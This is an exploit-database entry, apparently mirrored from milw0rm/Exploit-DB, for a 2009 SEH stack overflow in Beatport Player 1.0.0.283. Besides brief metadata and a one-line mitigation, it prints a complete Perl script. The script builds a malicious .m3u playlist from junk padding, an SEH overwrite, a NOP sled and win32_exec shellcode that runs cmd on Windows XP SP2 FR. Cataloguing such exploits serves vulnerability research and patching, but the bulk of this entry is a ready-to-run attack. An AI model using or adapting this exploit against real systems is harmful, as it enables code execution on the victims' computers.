Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)

vendor:

Beatport Player

by:

SirGod The Discover

7,8

CVSS

HIGH

Stack Core Overflow Exploit(SEH)

119

CWE

Product Name: Beatport Player

Affected Version From: 1.0.0.283

Affected Version To: 1.0.0.283

Patch Exists: Yes

Related CWE: N/A

CPE: a:beatport:beatport_player:1.0.0.283

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)

Beatport Player 1.0.0.283 is vulnerable to a stack core overflow exploit. This exploit works only on Windows SP2 FR. The exploit is written in Perl and uses a win32_exec shellcode to execute a command. The exploit creates a malicious .m3u file which contains a junk payload, a next_seh, a seh, a nopsled, and a shellcode.

Mitigation:

Update to the latest version of Beatport Player.

Source

Exploit-DB raw data:

 #!/usr/bin/perl
# Beatport Player 1.0.0.283 (.M3U File) Stack Core Overflow Exploit(SEH)
# Work Only in WIN SP2 FR
# Credit to SirGod The Discover
# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec -  EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh  = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
                    $junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
                    "\r\n";
close $playlist;

# milw0rm.com [2009-05-01]